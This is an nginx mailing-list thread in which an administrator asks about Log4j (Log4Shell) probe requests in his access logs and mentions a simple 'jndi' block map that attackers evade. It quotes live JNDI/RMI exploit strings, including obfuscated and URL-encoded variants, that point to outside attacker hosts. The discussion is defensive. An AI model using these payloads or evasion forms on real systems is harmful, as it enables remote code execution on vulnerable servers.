200 html return to log4j exploit

lists at lazygranch.com lists at lazygranch.com
Mon Dec 20 19:08:25 UTC 2021



On Mon, 20 Dec 2021 17:49:48 +0000
Jay Caines-Gooby <jay at gooby.org> wrote:

> The request is for your index page "GET / HTTP/1.1"; that's why your
> server responded with 200 OK. The special characters are in the
> referer and user-agent fields, as a log4j system would also try to
> interpolate these, and thus be vulnerable to the exploit.
> 
> On Mon, 20 Dec 2021 at 04:02, lists at lazygranch.com
> <lists at lazygranch.com> wrote:
> 
> > I don't have any service using java so I don't believe I am subject
> > to this exploit. Howerver I am confused why a returned a 200 for
> > this request. The special characters in the URL are confusing.
> >
> > 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET /
> > HTTP/1.1" 706
> > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}"
> > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-"
> >
> >     log_format  main  '$status $remote_addr - $remote_user
> >     [$time_local] "$request" ' '$body_bytes_sent "$http_referer" '
> >                       '"$http_user_agent" "$http_x_forwarded_for"';
> >
> > That is my log format from the nginx.conf.
> >
> > I now have a map to catch "jndi" in both url and agent. So far so
> > good not that it matters much. I just like to gather IP addresses
> > from hackers and block their host if it lacks eyeballs,
> > _______________________________________________


Thanks for both replies. Note the hackers have done a work around to
get past my simple "map" detection. Matching jndi is not
sufficient. Examples:

103.107.245.1 - - [20/Dec/2021:14:38:15 +0000] "GET / HTTP/1.1" 706 "${${::-j}ndi:rmi://188.166.57.35:1389/Binary        }" "${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" "-"

103.107.245.1 - - [20/Dec/2021:14:38:16 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F188.166.57.35%3A        1389%2FBinary%7D HTTP/1.1" 706 "${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" "${${::-j}ndi:rmi://188.166.57.35:1389        /Binary}" "-"

I can't really tell if this Indonesian IP address is an ISP or not so I guess I will let them slide from the firewall. The other IP is for Digital Ocean. I have some droplets there and yeah there are bad actors on the service. Kind of sad I have to block the vendor I use but probably AWS, Linode, etc is just as bad. For the price of the service you simply can't police it at scale. 

Probably another stupid question but what is up with this ${ stuff? I
need some terminology to google and read up on this. 


More information about the nginx mailing list